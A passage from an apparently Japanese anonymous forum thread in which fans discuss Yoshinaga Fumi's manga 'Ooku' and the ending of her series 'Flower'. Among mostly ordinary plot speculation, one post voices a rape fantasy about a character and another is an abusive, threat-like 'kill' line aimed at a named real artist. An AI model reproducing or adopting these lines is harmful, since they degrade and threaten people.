王子がインド風装束の半裸な格好で流し目トバしてた扉絵を思いだす。
子ども心にあれはすごい衝撃だった。

てか、編集。 嘘でも「陰陽師」も引き合いに出してやれよと。
(それこそ縁起でもないか)

雑誌派じゃないので、こんな話しか書けなくてすまんです。
でもよしなが好きです。

269 :花と名無しさん:2006/12/28(木) 01:56:44 ID:???0
脱線していきそうで申し訳ないが、陰陽師にもそれっぽいエピソードが?

270 :花と名無しさん:2006/12/28(木) 02:28:35 ID:???0
陰陽師は、白泉が拾う前に既に2回くらい掲載雑誌が変わってて
(正確には、一回目が休刊→リニューアルによる誌名変更で一時連載中断、
次が出版社倒産による廃刊で事実上の連載途絶)けっこうな雑誌クラッシャー。
で、最後は作品自体がクラッシュ。

途中までは「これは日出処を超えるか!?」と、夏目さんとかも大絶賛だったし
評価も人気も高かったので、残念に思ってる人は多い。と庇っておく。
そんなわけで連載再開のオファーは複数社から来てたが、
岡野さんが神の御神託を受けて、最終的に白泉を選んだそうだ。
よしながさんはそういう点についてはまず大丈夫だと思うが。

そういえばメロディになってからは、
原稿に電波な指定を入れて印刷所を困らせたり大変だったらしい。
印刷のエピソードで思いだしたので付記しておきます。

脱線を助長してしまってこちらこそ申し訳ない…





271 :268=270:2006/12/28(木) 02:33:57 ID:???0
ごめん、変な余白ができてしまった。

272 :花と名無しさん:2006/12/28(木) 03:55:58 ID:???0
やまざき貴子もララで揉めてなかったっけ
3分の1スペースに色々暴言や捨て台詞を書いていた気がする。

273 :花と名無しさん:2006/12/28(木) 08:25:07 ID:???O
いいかげんスレ違いなのでは・・・

274 :花と名無しさん:2006/12/28(木) 09:52:57 ID:???0
ドラマの「大奥 第一章」と同じ流れだ〜と何だか嬉しい気分で読んでます。

275 :花と名無しさん:2006/12/28(木) 11:56:07 ID:???0
>>274
そうなんだ!今日第一章SPの再放送やるので、楽しみに見るよ!

276 :花と名無しさん:2006/12/28(木) 12:33:30 ID:???O
やっぱり二人きりの閨では「千恵様」と呼んでるのね。
前にここで「そう呼んでくれたらいいなぁー」と書いたので嬉しいなぁ。
それも「お慕い申し上げております」とかじゃなく
つい出ちゃう地の京ことばで「好きや」なんて囁かれて。
一時的にでも女の姿にも戻れて、千恵様ホント良かったねえぇ。
でも、あの春日の側近の男達が気になる。
次回、絶対必従春日の命で無理やり二人を引き離すのかな。

277 :花と名無しさん :2006/12/28(木) 19:50:04 ID:???0
千恵様に将軍としての教育や権限?が与えられていたのに、ちょっと驚いた。
世継ぎを生むためだけの存在として、女子教育オンリーで育てられていたと思ってたよ。

278 :花と名無しさん:2006/12/28(木) 20:15:13 ID:???0
詳しい中身感想はあとで書くとして

千恵姫…! 閨での会話に萌えそ〜…
千恵かわいいよ千恵(*´Д`) …性格がねv

一つ個人的難点を言えば、絵柄のせいなんだろうけど
紅を引いてるし、最初から少女設定で読んでるからわかるんだけど
よしながって可愛らしい女の子をうまく描けないのかなぁ。
江戸時代・和風っぽいサッパリとした絵と言う点では向いてるが。
ちょっとカマっぽく見えてしまう時も…w 口の中の歯を描きすぎな気も。

今号の表紙カラー(つか扉絵もほとんど同じだが)の
有功さまは、煽りの「凛として」に非常にマッチしていてイイんだけどね〜。

279 :花と名無しさん:2006/12/28(木) 20:37:05 ID:???O
新キャラの捨蔵、お楽かな?お夏かな?お楽は武家出身だからお夏かな
性格的にも玉栄とソリ合わなさそうだ

280 :花と名無しさん:2006/12/28(木) 21:26:44 ID:???0
>>277
教育も権限も無いでしょ。

正勝は多分雑談のつもりで千恵姫に政治の話をしていたのだと思う。
ところが千恵姫には才覚があったので、その意見を取り入れる結果に。
老中たち(?)にも、千恵姫の案とは言っていないし。

今月号の段階では少なくとも武家側は、女が男に代われるものと、誰も思っていない。



281 :花と名無しさん:2006/12/28(木) 21:39:15 ID:???0
そう言えば、よくある出版社の買わせる企画で
http://comic6.2ch.net/test/read.cgi/gcomic/1161709322/238
次号連載はないのに、よしなが×羽海野チカとの対談があるよ。

282 :花と名無しさん:2006/12/28(木) 22:00:24 ID:???O
側近の一人の娘も男装させられてたから、あの娘が働き掛け側近が徐々に女容認になっていくんだろな
男子絶対主義は最終的に春日一人になる悪寒

283 :花と名無しさん:2006/12/28(木) 22:37:46 ID:???0
春日は死ぬ時、女系優先になる世の中を認めて逝けるんだろうか。


284 :花と名無しさん:2006/12/28(木) 22:47:07 ID:???0
>>283
逝けないから、「没日録」になったのと違うかな?
「女子が中心でも立派に世の中成り立ちますっ」と
思っていたら、他のタイトルにしそうな気が。

285 :花と名無しさん:2006/12/28(木) 23:22:04 ID:???0
春日様の心情変遷予想

ヽ(#`Д´)ノウワァァン!!→この国オワタ\(^o^)/ →('A`) モウドウナッテモシラネ

286 :花と名無しさん:2006/12/29(金) 00:20:11 ID:???0
あの男装させられてた娘、健気で萌えたので活躍してほしいな。
早く女の装束を身に着けてお仕事できるようになったらいいのに。

287 :花と名無しさん:2006/12/29(金) 00:30:45 ID:???O
家光と仲良くなれそう。
やがて大手を振って女の姿になれるとはいえ、最初からそうだった人と
男装強制経験のある人とじゃ感覚違うだろうし。

288 :花と名無しさん:2006/12/29(金) 00:31:01 ID:???0
「ご内証の方」のしきたりって、千恵姫みたいに無理矢理強姦されることがないように出来たものなのかな?

289 :花と名無しさん:2006/12/29(金) 00:46:21 ID:???0
大奥で盛り上がってきたところ豚切って悪いが
メロと同様に、本日発売の最新「Wings」でフラワーが完結!
久々に公式サイト見たら、表紙の花束持った笑顔のハルが可愛い(*´ー`)

中身の巻頭カラーはどんな感じでしたか?
今日本屋でチェック忘れてしまったのですが(本日発売モノが多かったので)、
見た人がいたら感想よろしくです。

290 :花と名無しさん:2006/12/29(金) 10:37:45 ID:???0
>>288
千恵姫が手討ちにしちゃったから、後付けでそういう理由にしたような気がする。

291 :花と名無しさん:2006/12/29(金) 13:18:46 ID:???0
>>290
んーでも、有功が来た時点では、制定されてなかったよね?
「家光様は最初の男を殺したらしいですぜ」と噂を放任していたし、実際
武士が町人を斬ってもよかった江戸時代、将軍が使用人を斬っても別に
咎められないと思う(使用人とはいっても、有力者の息子かもしれんが)。
それが後々まで続くには、何らかの他の理由があると思うよ(家光の評判を
守るためだけだったら、制度化して続ける必要はない)。

292 :花と名無しさん:2006/12/29(金) 13:29:32 ID:???0
有功のそっくりさんをあてがえば、家光姫が喜んで子供を作るとでも思ってるんだろうか?あのババ。
まあ、所詮思考形態の根っこが「七色飯」の人だからなぁ・・・
私だっら怒り狂っちゃうよ。「馬鹿にするな!」ってさ。

293 :花と名無しさん:2006/12/29(金) 14:22:37 ID:???0
>>291
将軍職を継ぐべき嗣子は女子、と確定した時点で制度化されたんじゃないか?
春日が定めたのではなく、お万が大奥総取締になったときに決めたのかも。

294 :花と名無しさん:2006/12/29(金) 14:25:55 ID:???O
同意。
自分が春日の立場なら、他の男をあてがうにしても違うタイプの美男を選ぶな。
上様が有功で満足してる以上、同じ顔は二つもいらないわけで、余計忘れがたくならないか?
有功と顔も性格も違う庶民的・野性的な水野みたいな美男とかに再誘惑させた方がいいような希ガス。

295 :花と名無しさん:2006/12/29(金) 14:26:22 ID:???0
玉栄がでかくなってて妙に嬉しい。良い男になるよ君は。

千恵姫、もうすこし可愛く描けないもんかな?
眉をゆがませた笑顔がどうも嫌味っぽい女の表情みたいで嫌だ。

296 :花と名無しさん:2006/12/29(金) 14:29:21 ID:???0
>295
見てないけどそれが家光似なところだから仕方がないのでは

297 :花と名無しさん:2006/12/29(金) 15:57:46 ID:???0
町人を教育しまくって有を殺して入れ替わりんとかないよね?いやだそんな展開

298 :花と名無しさん:2006/12/29(金) 16:49:18 ID:???0
>297
そんな小手先の猿芝居に騙される上様ではないと思うけど、実際やりかねないからなぁ>春日
史実どおり「大奥総取締役」にまで上り詰めるとしたら、ババの方が寿命尽きるけど。



299 :花と名無しさん:2006/12/29(金) 17:27:47 ID:???0
閨に侍る時、内緒で入れ替えるのでは。
当時の明かりなんて薄暗いだろうから、騙して一度契らせてしまえば何とかなるって考えでは?

300 :花と名無しさん:2006/12/29(金) 18:01:28 ID:???0
そのような気がいたす

301 :花と名無しさん:2006/12/29(金) 19:32:52 ID:???0
女体はデリケートですから
顔よりもっと大事なとこが似てないと一発バレっす。

302 :花と名無しさん:2006/12/29(金) 19:59:26 ID:???0
あの時代の夜なんて、すげー暗いんだから、顔そっくりの用意したって全然意味ないよなぁ。
ことに及ぶ前に、口開いたら一発でわかるやん。声だって違うし、話し方や受け答えでわかる
だろうに。

303 :花と名無しさん:2006/12/29(金) 20:11:20 ID:???0
家光20歳:お彩を襲う
家光29歳:家光死亡、千恵姫11歳
家光37歳:有功18歳、還俗し小姓に

千恵姫11歳:家光死亡
千恵姫15歳:女児出産
千恵姫現在:お万18歳大奥入り ※3年前、初めての男を切り殺す

何か計算が合わないよーな…
数え年と満年齢が混じってる?

304 :花と名無しさん:2006/12/29(金) 20:12:08 ID:???0
目で見るんじゃない!心で感じるんだ!

305 :花と名無しさん:2006/12/29(金) 22:12:52 ID:???0
前号と今号で一年しか経ってないのが信じられないほど千恵姫が成長して見える。
中身もぐっと大人になったし背なんか凄い伸びて思いっ切り少女→女になってるように見えるんだが…。
3年くらい経過してると言われたほうが納得するよ。

306 :花と名無しさん:2006/12/29(金) 22:47:17 ID:???0
>>289
前号がアレだったから色々怖いこと心配してたけど個人的に
納得がいくというかうまくまとまったラストだな、と思った
ハル太と真島のやり取りがなんかよかったな

4巻は2007年春発売とのことです

307 :花と名無しさん:2006/12/29(金) 22:49:28 ID:???0
有を殺して悲痛の上様に似た男をあてがうってのは?
それでお玉が対抗するとか

308 :花と名無しさん:2006/12/29(金) 22:59:29 ID:???0
フラワー最終回見たらシゲが女版小野ポジションのように思えてきた…
西洋みたいにフラワーも同人出したりするんだろうか?
ノーマルだから無いかな

309 :花と名無しさん:2006/12/29(金) 23:10:49 ID:???0
最終回立ち読みしたけどちょっと泣きそうになった

310 :花と名無しさん:2006/12/29(金) 23:11:06 ID:???O
フラワー、真島が人間らしくなってたな
個人的にはネタキャラのまんまあっさりしてたのが好きだったが
今後は滋のご都合通りになるのだろうかw

311 :289:2006/12/30(土) 01:20:01 ID:???0
>>306
レスありがd。前号のネタバレ読んだら、ちょっとショック(悲劇風味?)な
展開になりかかっていたようので心配で。コミクス化が楽しみです。

312 :花と名無しさん:2006/12/30(土) 06:10:12 ID:???0
え?フラワーもう最終回なんか
早いもんだ……

>>305
成長期の時に驚くほど背が伸びる子っているし、
おマンのおかげで性格も大人になったのさ


313 :花と名無しさん :2006/12/30(土) 08:44:45 ID:???0
七色飯ってことは、有巧と捨蔵と・・・あと五人あてがう気か春日のばばさま。

314 :花と名無しさん:2006/12/30(土) 10:26:59 ID:???O
え、まさか…w
千恵姫がお世継を産むまで、正室に当たる有功以外に6人も側室を準備は
しないだろう。単なる例え話じゃないの…か?

しかしあのホントは女なのに、ガッシリした体型になってしまった大名家の娘に
笑ったり・切なくなったり…。
もう少し母親が本人の気持ちをくみとってやって欲しかったなぁ。

315 :花と名無しさん:2006/12/30(土) 11:07:25 ID:???O
史実の側室のうち、有名どころや子供出来た側室は出てくるんじゃないかな
五人くらい?揃うかも

316 :花と名無しさん:2006/12/30(土) 11:46:44 ID:???0
まあ、将来、大奥は「美形千人」とか言われるようになるわけだし、
5,6人ぐらいは軽く揃えてきそうだよな、春日のばっちゃ。


317 :花と名無しさん:2006/12/30(土) 13:23:56 ID:???O
庶民派の捨と玉栄が色んな意味でエグいバトルを繰り広げるだろう(予想)けど
他にも色んなタイプを揃えるだろうしね。
玉栄の闘魂からして、お万への敬意は変わらずとも自分の権力拡大を大いに楽しみそうだ、大奥向き。

318 :花と名無しさん:2006/12/30(土) 14:13:09 ID:???0
もし、玉栄が権力闘争に燃えるようになっても、
有功を敬愛する気持ちだけは失くさなければいいな、と願ってます。

319 :花と名無しさん:2006/12/30(土) 14:37:59 ID:???O
男達も複雑だろうが上様が一番辛いよな、カワイソス
女は一人の人にゾッコンになったら他はいらない!って人が多いだけに
心にそまぬ側室迎えるの辛い、しかも出産までさせられるし
有功第一の上様の心を一番理解できるのは玉栄だから、その分寵愛が深くなるのかな?

320 :花と名無しさん:2006/12/30(土) 16:30:51 ID:???O
も少しドロドロしてほしいな。大奥なんだし

321 :花と名無しさん:2006/12/30(土) 16:40:42 ID:???O
史実ではお万との子はもうけないんだっけ?
側室はたくさんいるからなぁ…
嫌々作るんでしょう

322 :花と名無しさん:2006/12/30(土) 17:23:32 ID:???0
史実では、同年に複数の側室が子どもを生んでるっていう例はあるの?
もしあるなら、そういうのはどうやって辻褄をあわせるのだろうか。

323 :花と名無しさん:2006/12/30(土) 17:51:08 ID:???O
そこまで正確にしなくてもいいんじゃない?年子とかにするとか

324 :花と名無しさん:2006/12/30(土) 20:07:20 ID:???0
本編と全然関係ないけどせんべい有功だけ似てなさすぎる

325 :花と名無しさん:2006/12/30(土) 20:30:36 ID:???0
縛られたお万の前で上様をレイプしてやりてえ

326 :花と名無しさん:2006/12/30(土) 21:05:11 ID:HWhfqWKT0
(・∀・)

327 :花と名無しさん:2006/12/30(土) 21:11:12 ID:???0
春日の仕打ちに耐えられなくなった上様が
自分が権力を握る事で対抗しようと考え、
それで一気に男女逆転が進むとか。

328 :花と名無しさん:2006/12/30(土) 21:29:22 ID:???0
捨蔵のこれからの行動が後押しになって
例の制度が制定される可能性もあるわけか。

329 :花と名無しさん:2006/12/30(土) 22:04:50 ID:rbGjtxpZ0
>327
春日にとって家光姫は、あくまでも「子宮を持った”竹千代君”」でしかないからね。
「上様は楽しい事だけお考え遊ばせ」って台詞からして、端から政治的力など
持たせようなんて考えちゃいないって事が分かる。
自分の溺愛してた上様よりより強く、ひいじいさま(家康)のDNAを受け継いでいる事に
気がついていないのか、あえてそこから目をそむけてるのか、今の段階じゃ不明だけどね。
まあ、この先確実に春日は病に倒れるから、それまでじっと息を潜め屈辱に耐えながら
形勢逆転を狙っていくんだろうな。(お万という優秀なブレーンを得たわけだし)




330 :花と名無しさん:2006/12/30(土) 22:28:20 ID:???O
お楽の方→家綱
お玉の方→綱吉
お夏の方→六代将軍父(名前失念)
お振の方→千代姫(尾張藩主御簾中)
夭折せず成人しただけでも、これだけの子供がいるが
千代姫(男)とか存在自体消されそうな鬼が市内でもない

331 :花と名無しさん:2006/12/30(土) 23:01:10 ID:???0
ご懐妊がまだって
あえて二人はできないようにしてるのかな?
ってちょっと思ったんだけど
どう思う?

332 :花と名無しさん:2006/12/30(土) 23:05:30 ID:???0
実は有はやっぱり抱き方よくわかってな(ry

333 :花と名無しさん:2006/12/30(土) 23:08:56 ID:???0
フラワー最終回のネタバレ師さんが現れた!
早売りバレスレの268-271、詳細に乙&ありがdです。
(たぶんこのスレ住人さんだと思うので…)

今日昼間、隣の市のデカい書店で買ってきた
フラワーのドラマCDでも聞きながら、余韻に浸ろうと思う。
(最近よしなが信者になったばかりなので、↑初めて知った)

334 :花と名無しさん:2006/12/30(土) 23:49:26 ID:???0
フラワー最終回いつもよりかなりページ多いから文字バレ大変そうw
そういえば西洋の最終回もページ多かったなあ…。
Wingsの方でもまた新作読めたらいいな。大奥と合わせて楽しみたい。

335 :花と名無しさん:2006/12/31(日) 00:17:15 ID:GWaXK+gK0
>>330
お夏vsお玉の争いが激しかったんだよな、確か。
お楽は一足先に家綱産んで、しかも長男だったから速攻で跡継ぎ決定。
その家綱が病弱だったから、その次を巡ってお玉とお夏が争って、
お夏の子が早世してお玉の勝ち、と。

お玉の子が生まれるのは最後だけど、どこのあたりどうするんだろうね。

336 :花と名無しさん:2006/12/31(日) 01:02:55 ID:???0
◆ニュースです!◆
白泉社公式サイトにて、アンケートに答えると「大奥」の
壁紙がダウンロードできるますよ〜ヽ(゜Д゜*)丿
名前は問われず、都道府県名や年代など読者リサーチの
アンケートでした。
千恵姫が有功のあごを手にかけ、見詰め合うシーンです。

ttp://www.hakusensha.co.jp/2007nenga/

337 :花と名無しさん:2006/12/31(日) 01:41:34 ID:???0
>336
ありがとう、大奥としばわんこを戴きました


338 :花と名無しさん:2006/12/31(日) 08:04:25 ID:e9n4vwjQ0
フラワーのネタバレ師さんすばらしいわ
手元に2月号あるけど詳細もらさずかつ饒舌になりすぎず
しっかりと内容を紹介してある
文才あるなぁと思った

339 :花と名無しさん:2006/12/31(日) 14:25:23 ID:???0
フラワー、切なくも未来のある終わり方でいいなぁ
自分がされてイヤなことは他の人にもしない、から
他の人の立場になって気持ちを考える、にハル太が成長したわけだな
皆いい子で良かったよ 真島もがんがれ

340 :花と名無しさん:2006/12/31(日) 16:33:00 ID:???0
ネタバレOKな単行本派だけどネタバレ読んだら本誌読みたくなってきた
ハル太の成長はよかったね。あと滋と真島のこれからが気になる・・・


341 : 【大凶】 :2007/01/01(月) 01:06:04 ID:???0
空けお目〜
フラワーのコミックス今から楽しみだ〜

342 :sage:2007/01/01(月) 01:23:49 ID:iYjEuI3wO
コミクス派です。はーやーくー出ろー。
楽しみだー

343 :花と名無しさん:2007/01/01(月) 01:25:28 ID:???O
まちがえたー

344 :花と名無しさん:2007/01/01(月) 02:53:10 ID:???0
よしなが「大奥」世界の光圀公が見たい!
正夢になるよう初夢みてきますノシ

345 :花と名無しさん:2007/01/01(月) 03:06:27 ID:???0
>>344
おやすみ〜
自分はそろそろシャワー浴びたら、近場に初日の出拝みに行こうかな。

346 :花と名無しさん:2007/01/01(月) 03:50:56 ID:???0
上様、市井におしのびで遊びに行くとき
薬種問屋の田嶋屋を根城にしちゃったりしないだろうか
どっかの某暴れん坊将軍みたくw

347 :花と名無しさん:2007/01/01(月) 09:07:54 ID:???O
>346
それはそこに上様が男を連れ込む可能性もあるんじゃw

348 :花と名無しさん:2007/01/01(月) 12:05:46 ID:RAVgVR2F0
>344
あけましておめでとう!
光圀公といえば、江戸でヤンキー(笑)してた若かりし頃か、
犬公方様に犬の毛皮を送りつけたチョイ悪ババの頃かな?
私はどちらも見たいけどw


349 :花と名無しさん:2007/01/01(月) 12:07:32 ID:???0
>348です。
あげまして・・・になっちゃった。スマソ

350 :花と名無しさん:2007/01/01(月) 13:53:16 ID:???0
誰がうまいことを言えと…

351 :花と名無しさん:2007/01/01(月) 15:25:04 ID:???0
ヤンキーというより、レディースだよ。
そして関東連合を結成して、竹刀持っているんだよ。

352 :花と名無しさん:2007/01/01(月) 16:06:00 ID:???0
>351
うわー!よしなが絵で激しく見たい!!
ちなみに一人称は「アタイ」でヨロシクw

353 :花と名無しさん:2007/01/01(月) 22:43:11 ID:RMp9U4uTO
軍馬に乗って走りだす光圀タン。

354 : 【小吉】 【300円】 :2007/01/01(月) 22:43:32 ID:???0
運試し〜

355 : 【だん吉】 【377円】 :2007/01/01(月) 22:58:54 ID:G8o0qZF40
おいらも〜

356 :花と名無しさん:2007/01/01(月) 23:14:07 ID:???0
歌舞伎には、元ネタのキャラ性別をひっくり返した一種のパロディ的作品がある。

スーパーパワーで大きな刀を軽々扱い悪者をやっつける「女暫(おんなしばらく)」
男知らずの純潔さが超能力の源だったが、色男の手管に陥落する尼僧「女鳴神(おんななるかみ)」

ただ男女の役割をとりかえただけでなく、女暫のヒロイン(!)は自分の怪力を見られ「おお恥ずかし」と袖で顔を隠すし
鳴神尼僧の陥落シーンはもろ和姦を装ったレイプだし。女ならではの描写をきっちりしているのが凄い。

「大奥」の描き方に通じるところがあると、読み始めてからずっと感じていた事を書き込ませてもらいました。




357 :花と名無しさん:2007/01/03(水) 18:45:17 ID:???0
歌舞伎って同人に通ずるものがあるな…

358 :花と名無しさん:2007/01/04(木) 10:42:22 ID:???O
んー
まぁ、マメなオトコになって、丁寧にしなきゃだめだよと
優しすぎるオトコ像だが、哀愁ただようキャラばかりだな

359 :花と名無しさん:2007/01/04(木) 11:03:40 ID:ua3mtg360
ご参考までに、

よしながさんがカバーイラスト描いてます。

ドニ・ディドロ著『運命論者ジャックとその主人』、白水社刊
定価3,400円 四六判361頁 ISBN4-560-02758-7 【好評発売中】

360 :高橋佳子:2007/01/04(木) 13:02:37 ID:Fm+72hpqO
海野のせいで漫画家なれず売春疲れた殺す

361 :花と名無しさん:2007/01/04(木) 13:48:30 ID:???0
フラワー最終回
真島は結局どうするんだろう
どうもしないのかな
真島が好きだったからちょっと(´・ω・`)な最終回だった
でもよしながさんは大団円書かないから、らしいといえばらしい

362 :花と名無しさん:2007/01/04(木) 16:28:20 ID:???0
千恵姫と有功が寝てる掛け布団が地味なのが気になる。
将軍だし、キンキラキンの布団なのかと思ってた。
死んじゃった方の家光のは一応柄入りだったね。

363 :花と名無しさん:2007/01/04(木) 17:08:55 ID:???0
>362
今日やっと「大奥」読めたよorz
お布団のグレード一つ取っても、いかに春日が家光姫を「繋ぎ」としか捉えていないかが分かる。
そういうところの描写が細かくて鋭いね。
確かに本家(笑)家光は一発で市井の女を孕ませたし、娘も初貫通で一発懐妊。
妊娠しやすい(させやすい)遺伝子の持ち主とはいえ、同衾し始めてまだ1年でしょ?
気が早すぎるよババァ。
しかしお万のそっくりさんがあれほど露骨な「楽して立身出世w」的キャラとはのう・・
春日、お万殺す気満々じゃねーか!?

364 :花と名無しさん:2007/01/04(木) 17:20:33 ID:???0
殺しても何の利点もないような…

365 :花と名無しさん:2007/01/04(木) 17:24:50 ID:???0
>363
>家光は一発で市井の女を孕ませたし、娘も初貫通で一発懐妊。

これで思い出したが、姫って母親と同じ目に遭っているんだよね・・・。
若紫の名も繰り返し出たし、ちょっとずつ伏線をずらしてスパイラル状に
話を組み立てる手腕はさすがだなぁ・・・と思った。
今後も、何気ない言動が伏線だったと気づくことがあるんだろうなぁ。

366 :花と名無しさん:2007/01/04(木) 18:00:10 ID:???0
>>364
お万が生きている限り、「お万のそっくりさん」は必要ないから、殺すのではないか。と思いました。
本物殺害→家光姫にそっくりさん(春日の言う事を聞くお万)を与える→
お世継誕生→将軍の父も自分の配下に置いて春日ウマーということでは。
春日にとって大奥の頂点に立つのは自分、家光姫の寵愛を一身に受けるお万に取って代わられたくないのでは。

367 :花と名無しさん:2007/01/04(木) 18:25:22 ID:???0
そっくりさん与える→世継ぎ誕生

ここはそんなうまくいかないだろう。
有が殺されてホイホイ似たような男と寝るような千恵姫じゃないし
そっくりさんだって春日に絶対服従するようなタイプとは思えない

368 :花と名無しさん:2007/01/04(木) 18:28:11 ID:???0
なるほど。

春日がなんとしても家光の孫が欲しくて&家光の孫が将軍になるまで見届けたくて、
しかし春日自身はすでに老い先短いので千恵姫には一刻も早く妊娠して欲しい。
早く早くお世継ぎを願っているから、一年千恵姫が妊娠しないだけでも焦れてしまった。
で、男側室を入れることを考え出した。

くらいのことかと考えていた。

369 :花と名無しさん:2007/01/04(木) 18:37:46 ID:???0
まあでもよくある話として
恋人が不慮の事故とかで死んでしまって
嘆き悲しんでるところへ恋人とよく似た顔立ちの、でも性格は180度違う男が現れて
最初は反発するものの男の明るさに救われて、とか

顔はそっくりだけど中身がぜんぜん違う!→いつ見ても腹立つ!→視界に入ってきて目障り!
→気になる→四六時中気になる→あれ?

っていう流れはあるよね

370 :366:2007/01/04(木) 18:51:23 ID:???0
>>367
私も常識で考えたら、そううまくはいかないだろうとは思うけど、春日の考えの基本は
七色飯(どこかずれてる)ですから。
「お万を殺しても、そっくりさんを与えれば家光姫もいずれ納得するだろう」とか
「いやしい身分の者(そっくりさん)は自分に服従して当然」とか考えてそう、と思ったものですから。

371 :花と名無しさん:2007/01/04(木) 18:57:57 ID:???0
そこで対抗馬にお玉登場ですよ

372 :花と名無しさん:2007/01/04(木) 19:04:01 ID:???0
>同衾し始めてまだ1年でしょ? 気が早すぎるよババァ。

昔は「3年子供ができなきゃ離縁もおk」と言うのが常識だった日本。
しかも、若い男は奇病で死者が蔓延している世の中という設定なら、
1年子ができなきゃ、焦るのはわかるような気もする。
春日にとっては、千恵姫の幸せなんてかなりどうでもよくて、
元・家光の子孫/男が産まれれば万々歳なんだし。

>>368-369は、同意かなー。

373 :花と名無しさん:2007/01/04(木) 19:13:19 ID:???0
うんうん。
今回、子飼いの臣下にもこぼされてたけど、春日自身には野心といわれる物は無いんだよね。
ただただ「♪上様(本家)と私の為に大奥はあるの〜♪」←古くてスマソ
って感じで、政権を握って幕府を影から支配しようとか、男が持ちそうな考えは無い。
有功が持った彼女の初印象も「意外な程質素な身なり」だったしね。
自分にだけ駄々をこねて甘えていた家光姫が、今や有功オンリーになった事への
嫉妬はしているだろうけど。そんな「些細な事」より、お世継ぎお世継ぎ!
自ら手を下していないものの、数多くの命を奪っている彼女。よもや死語極楽へ行けると
思っちゃいないだろうが、現世で少しでも報いを受けて欲しいよ全く・・・


374 :花と名無しさん:2007/01/04(木) 19:23:51 ID:???0
>>372
今でも妊娠することを希望して性生活も送っているのに妊娠しないカップルが
不妊症と定義されてるしね・・・。

375 :花と名無しさん:2007/01/04(木) 20:37:16 ID:???0
千恵姫がお万を本当に好いているのは確かだろうけど、だからと言って他の男になびかないかと
言えば、わからないな…
お万の顔自体は、初めて会った時から気に入っていたようだし
捨蔵は女を落とす手管を知り尽くしている感じだし、あっさり落とされてもおかしくないかも…とか
思った
でも捨蔵とお玉は対立しそうだね

376 :花と名無しさん :2007/01/04(木) 21:08:31 ID:???0
千恵姫には拒否権ってないのかね?
捨蔵が床に入ってきても「チェンジ」とかさ。

377 :花と名無しさん:2007/01/05(金) 01:08:53 ID:???0
結婚して避妊していないにもかかわらず、
2年経っても子供ができないと不妊症とされるので
まあ「3年子なきは去れ」というのは経験値なのかも。

378 :花と名無しさん:2007/01/05(金) 08:15:16 ID:???0
細かい展開は想像つかないけど
捨蔵がきっかけで玉栄が千恵と関係を持つことになる予感

379 :花と名無しさん:2007/01/05(金) 10:11:39 ID:???O
また次号待つの辛い。
毎週出して欲しいよ……

380 :花と名無しさん:2007/01/05(金) 10:26:19 ID:???0
週刊かいw

381 :花と名無しさん:2007/01/05(金) 11:09:07 ID:???O
隔月でもキツいのに、1回飛ばしだからねぇ。
絵にする為の下調べに、時間食うんだろうなとは思うが…。

382 :花と名無しさん:2007/01/05(金) 16:33:02 ID:???0
>362>363
水野と吉宗公のお閨の布団も地味だし閨用と将軍独り寝用は違うのかもよ。
布団の形も違うし(独り寝は男吉宗も輝綱君も袖つきのでかい着物に綿入れたタイプ)。
つか閨用の布団に刺繍だの金糸銀糸に絹だのってやってたら洗濯も大変だ。

383 :花と名無しさん:2007/01/05(金) 16:39:34 ID:???0
×男吉宗 ○男家光だ。済まん。

384 :花と名無しさん:2007/01/05(金) 18:16:58 ID:???0
素朴な疑問だが、布団って洗濯する?打ち直しってのはあるけど。
江戸時代の事だから現代のように頻繁に洗濯なんてしないんじゃ?
こまめに洗濯するのは、肌襦袢やふんどしみたいな下着だけじゃないかな。

385 :花と名無しさん:2007/01/05(金) 18:42:04 ID:???0
閨用の布団は色んな液体で汚れますからなグシシシ Byお伽坊主

386 :384:2007/01/05(金) 18:46:59 ID:???0
愚問でしたか......スマソw

387 :花と名無しさん:2007/01/05(金) 19:52:03 ID:???0
西洋の王侯貴族だと、
寝具は汚れたら使い捨てだったそうな。

吉宗は憤死しそうだが、家光あたりまでは
そんなんだったとしても驚かない。

388 :花と名無しさん:2007/01/05(金) 20:30:28 ID:???0
お布団は干したり、年一で綿を打ち直したりしますが、
シーツwは使い捨てでした。武家は絹、宮家は綿だったっけ?(逆?)
ちなみにほんとに捨てるわけではなく、当然洗濯した後は下賜されます。
足袋もそうだと聞いたような。

389 :花と名無しさん:2007/01/05(金) 20:54:19 ID:???0
金持ち(?)はすごいな>使い捨て
関係ないけどベッカムもパンツ使い捨てらしいね。

390 :花と名無しさん:2007/01/05(金) 20:56:54 ID:???0
なんでだろ?
遠征先で洗濯にだすとキモマニアに盗まれるとか?

391 :花と名無しさん:2007/01/05(金) 22:31:00 ID:???0
叶姉もそうだったような…パンツ吐き捨て。
で、替えのパンツを美香さんがいつも持参してるとか。
スレ違いすまん。

392 :花と名無しさん:2007/01/05(金) 23:44:10 ID:???0
新庄もパンツとソックス使い捨てだよ

393 :花と名無しさん:2007/01/06(土) 00:13:25 ID:???0
なんの話だよw


394 :花と名無しさん:2007/01/06(土) 00:32:26 ID:???0
美川憲一だっけ
パンツ捨てる時はハサミで切り刻んでから捨てるといったの

395 :花と名無しさん:2007/01/06(土) 00:48:57 ID:???0
自分も切り刻む ブラも


396 :花と名無しさん:2007/01/06(土) 01:27:19 ID:???0
最近は条例やら何やらうるさくてゴミ出すにも一苦労だよ

397 :花と名無しさん:2007/01/06(土) 07:18:21 ID:???0
家光たんはふんどしなのか?

398 :花と名無しさん:2007/01/06(土) 09:09:37 ID:???0
>>394
美川憲一は切り刻む必要ないだろーにww

399 :花と名無しさん:2007/01/06(土) 15:19:32 ID:???0
メロディ読んだ。しず(新・輝綱)のドス!ドス!な登場シーンと
「月のものが来るまで自分が女だって忘れてるわいwww」は
「うはwwwwすげえwww」と笑ったが、
次ページで月代を撫でながら「そうでも思わないとやってられない」
と独白していたのが切なかった。

今回改めて思ったが、よしなが氏は美形じゃない女性キャラの描き方が上手い。
悲愴感あるシーンでもブスキャラにありがちな卑屈っぽさ・お笑い要素が
全く見えないし、けっして悪目立ちせずイキイキと描かれてる。

400 :花と名無しさん:2007/01/06(土) 15:50:08 ID:???O
取り立てて美女でも美形でもない吉宗様に
ついふらっとする読者が出るくらいだしねw
〉女性キャラ書き分け

401 :花と名無しさん:2007/01/06(土) 16:01:44 ID:???0
吉宗は史実そのままを女で書いた、みたいなのを読んだ。
あんなに人気が出るとは思ってなかったそうだ。
おっさんから吉宗に抱かれたい、と感想があったって。

402 :花と名無しさん:2007/01/06(土) 17:32:11 ID:???0
すげえ!

私も脇役の味がいつもいいと思う。
ちらっと出てた魚屋さんとか、
ほっそい体で乳出してそれでも天秤かついでいる。
